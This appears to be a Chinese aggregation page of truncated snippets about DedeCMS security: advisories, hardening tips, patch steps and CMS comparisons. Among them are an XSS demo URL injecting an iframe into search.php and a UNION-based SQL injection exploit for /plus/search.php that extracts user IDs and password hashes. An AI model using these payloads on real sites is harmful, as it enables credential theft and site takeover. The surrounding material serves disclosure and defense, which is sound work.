解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名.如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式. 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析.这也就是传说中的Apache解析漏洞. 利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件

织梦/dedecms系统我们都知道是有很多漏洞的,我在调试投票功能的时候正好要用到投票功能,这不就出现了漏洞,下面我就给大家展示如何修复这个织梦投票漏洞 首先我们打开//dedevote.class.php文件,查 找代码 代码如下 $this->dsql->ExecuteNoneQuery("UPDATE `dede_vote` SET totalcount='".($this->VoteInfos['totalcount']+1)."', votenot

漏洞版本: dedecms织梦5.5 漏洞描述: 北洋贱队(http://bbs.seceye.org)首发 demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3E&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0

漏洞版本: dedecms织梦 v5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持.高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源.模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求. demo1:h

dedecms织梦建站后怎么防止被黑,加强安全漏洞措施? 很多人反映dedecms织梦网站被黑的情况,因为织梦相对来说漏洞还是挺多的,特别是新建设的站点,有些目录.文件该删的删,权限及安全都要设置,以防止被黑,下面赵一八笔记教大家怎么将dedecms的安全做到极致. 一.安全删除篇: 织梦的功能模块是很多的,对于一般企业而言,简单的文档发布就够用了,删除一些不用的模块是做好安全的第一步.可以删除的模块如下,请各位朋友按照需求删除.尤其是plus目录的一些文件,未用到的尽量删除,因为织梦历史上漏洞

php才是建站的主流,cms这类程序又是用的最多的,占据主流的cms主要就是织梦,帝国,phpcms这三种的,这三个程序都是开源程序.国内用户众多.   一.从美观性来说(以官方默认模版为准   phpcms发布的V9美观性无疑是最好的.界面整洁大方.织梦一直以来都是一个绿色模版,中规中矩,帝国无疑是最难看的了,并且自己必须修改默认模板才能让首页显示数据,不能像织梦和phpsms那样自动调用,这个对于很多新手有点难度.不必过多解释.   二.从运行速度来说   帝国的操作生成速度应该是最快的,架

现在建网站不需要请程序员从基础的程序开发做起了,有专业的建站工具,CMS是使用最广泛的建站工具.CMS是Content Management System 现在建网站不需要请程序员从基础的程序开发做起了,有专业的建站工具,CMS是使用最广泛的建站工具.CMS是Content Management System的缩写,意为"内容管理系统",建网站用CMS足够了,不论是企业网站.行业网站.还是门户网站,CMS都能满足其要求.用CMS建网站虽然不需要开发程序,但还是需要网站美工的基础,就是必

常见可疑文件夹: 1:article文件夹:最近很多织梦系统网站根目录被上传article文件件,里面有很多赌博静态违法html页面,可疑直接删除,此类违法信息大部分是由于您的网站存在dedecms安全漏洞,黑客或攻击者利用此漏洞上传木马病毒(webshell文件)获取您的网站控制权限,通过木马病毒上传多个恶意文件,以批量生成很多的html违法页面.:2:找到黑客或攻击者上传的木马文件(伪装成正常文件以.php结尾)并删除,挂马文件特征,大部分文件存在plus.upload.include.de

漏洞版本: Dedecms 5.5 漏洞描述: 漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录.其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值. <* 参考 by:Flyh4thttp://sebug.net/appdir/织梦(DedeCms) *> 测试方法: @Sebug.net   d

织梦dedecms是新手站长使用得比较多的一个建站开源程序,正因如此,也是被被入侵挂马比较多的程序.下面就来跟大家说一下怎么重新命名dedecms的include文件夹以及plus文件夹来提高网站的安全性,减少被黑客软件扫描到漏洞的概率. dedecms的漏洞主要集中在data.include.plus.dede.member几个文件夹中的php文件里,对于data这个文件夹我们可以把它移到网站的根目录外,dede可以冲命名,member可以删掉,一般用不着,special专题功能 instal

漏洞版本: Dedecms 漏洞描述: DedeCms是免费的PHP网站内容管理系统. 织梦内容管理系统(DedeCms) 以简单.实用.开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统. 在gpc=off的情况下,小说模块添加章节insert注入漏洞. <* 参考 http://loudong.360.cn/vul/info/id/1465 *> 安全建议: 厂商补丁: dedecms ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软

在织梦网站搬家之后再整站更新,往往会遇到访问首页的时候出现www/include/templets/default/index.htm Not Found!,这个问题我遇到过两次,都是这样解决的: 进入后台,系统->系统基本设置->核心设置,在这里把DedeCMS安装目录这个选项的值清空,往往就能解决问题. 产生这个问题的原因,大概就是因为搬家之后原来的安装路径和现在的安装路径不一致导致的.

"织梦"CMS注入高危漏洞情况 作者:    时间:2014-04-17   "织梦"CMS是由上海卓卓网络科技有限公司研发的一款网站建站系统软件,又称"DEDE内容管理系统",在国内应用较为广泛.2014年2月25日,该软件被披露存在一个高危漏洞,由于页面参数未进行严格过滤,存在SQL注入漏洞.受漏洞影响的织梦CMS 版本包括V 5.7 SP1及以下版本.至2月28日,针对该漏洞的攻击利用代码和相关利用工具在互联网上已经被公开传播.攻击者可利用

[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,3

今天在做网站监察的时候,发现网站出了一个问题,在对网站做木马监测的时候,扫描出一个可疑文件:/include/filter.inc.php,建议删除,但仔细检查后,发现此文件是织梦(Dedecms)系统自带的问题,那么,我们该如何解决呢?     漏洞描述:dedecms的filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,可以覆盖系统变量从而导致注入漏洞. 漏洞路径:/include/filter.inc.php 漏洞分析:   /include/filt

漏洞版本: DedeCmsV5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持. 1 <?php 02 require_once (dirname(__FILE__) . "/../include/common.inc.php"); 03 define('_PLUS_TPL_', DEDEROOT.'/templets/p

漏洞版本: DedeCmsV5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持. edit_face.php else if($dopost=='delold') //45行 { if(empty($oldface)) { ShowMsg("没有可删除的头像!", "-1"); exit(); } $user

漏洞版本: DEDECMS 5.1 漏洞描述: 同样是在magic_quotes_gpc=off的情况下可用 此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl ...... $urlindex = 0; if(empty($arcID)) { $row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcu

漏洞版本: 织梦(DEDE)CMS V5.3 漏洞描述: 织梦内容管理系统,最强大的中文开源CMS网站管理项目,使用PHP+MySQL架构. 在文件include/common.inc.php中: foreach($_REQUEST as $_k=>$_v)//第10行 { if( strlen($_k)>0&& eregi('^(_|cfg_|GLOBALS)',$_k)&&!isset($_COOKIE[$_k])) { exit('Request var

织梦在安装到阿里云服务器后阿里云后台会提示media_add.php后台文件任意上传漏洞,引起的文件是后台管理目录下的media_add.php文件,下面跟大家分享一下这个漏洞的修复方法: 首先找到并打开后台管理目录下的media_add.php文件,在里面找到如下代码: $fullfilename = $cfg_basedir.$filename;  在其上面添加一段如下代码: if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3

很多同学遇到网站被攻击挂马,大都不是竞争对手所为.多数情况下是黑客利用工具批量扫描入侵的.因此安全防护自关重要. 织梦安装时注意: 修改默认数据库前缀: 在dedecms安装的时候修改下数据库的表前缀,尽量不用默认的前缀dede_ ,随便改个其他的英文字母小写命名即可.以防止黑客猜到. 安装后去除所有再带后门和漏洞 1.修改默认后台路径: 作用:是防止黑客猜到你的后台,进行其他操作.进入网站根目录,就能看到dede文件夹,重命名即可.比如改为lisanbao这个时候访问后台就不是:你的域名/de